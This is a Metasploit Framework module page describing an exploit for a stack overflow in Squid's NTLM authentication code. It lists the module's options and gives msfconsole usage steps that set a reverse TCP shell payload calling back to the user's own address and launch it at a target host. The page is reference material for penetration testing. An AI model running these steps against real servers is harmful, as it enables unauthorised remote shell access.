Browse Exploit & Auxiliary Modules

The Metasploit Project hosts the world's largest database of quality assured exploits, including hundreds of remote exploits, auxiliary modules, and payloads. You can even review the Metasploit Framework source code of any module - or write your own.

Search for modules

Squid NTLM Authenticate Overflow

This is an exploit for Squid\'s NTLM authenticate overflow (libntlmssp.c). Due to improper bounds checking in ntlm_check_auth, it is possible to overflow the 'pass' variable on the stack with user controlled data of a user defined length. Props to iDEFENSE for the advisory.


Rank

  • Great

Authors

  • skape < mmiller [at] hick.org >

References


Exploit Targets

  • 0 - Linux Bruteforce (default)

Development


Similar Modules


Usage Information

$ msfconsole

                ##                          ###           ##    ##
 ##  ##  #### ###### ####  #####   #####    ##    ####        ######
####### ##  ##  ##  ##         ## ##  ##    ##   ##  ##   ###   ##
####### ######  ##  #####   ####  ##  ##    ##   ##  ##   ##    ##
## # ##     ##  ##  ##  ## ##      #####    ##   ##  ##   ##    ##
##   ##  #### ###   #####   #####     ##   ####   ####   #### ###
                                      ##

msf > use exploit/linux/proxy/squid_ntlm_authenticate
msf exploit(squid_ntlm_authenticate) > show payloads
msf exploit(squid_ntlm_authenticate) > set PAYLOAD generic/shell_reverse_tcp
msf exploit(squid_ntlm_authenticate) > set LHOST [MY IP ADDRESS]
msf exploit(squid_ntlm_authenticate) > set RHOST [TARGET IP]
msf exploit(squid_ntlm_authenticate) > set RPORT [TARGET PORT]
msf exploit(squid_ntlm_authenticate) > exploit


Module Options

RHOST The target address
RPORT The target port
BruteStep Step size between brute force attempts
BruteWait Delay between brute force attempts
CHOST The local client address
CPORT The local client port
ConnectTimeout Maximum number of seconds to establish a TCP connection
ContextInformationFile The information file that contains context information
DisablePayloadHandler Disable the handler code for the selected payload
EnableContextEncoding Use transient context when encoding payloads
Proxies Use a proxy chain
SSL Negotiate SSL for outgoing connections
SSLVersion Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
VERBOSE Enable detailed status messages
WORKSPACE Specify the workspace for this module
WfsDelay Additional delay when waiting for a session
TCP::max_send_size Maxiumum tcp segment size. (0 = disable)
TCP::send_delay Delays inserted before every send. (0 = disable)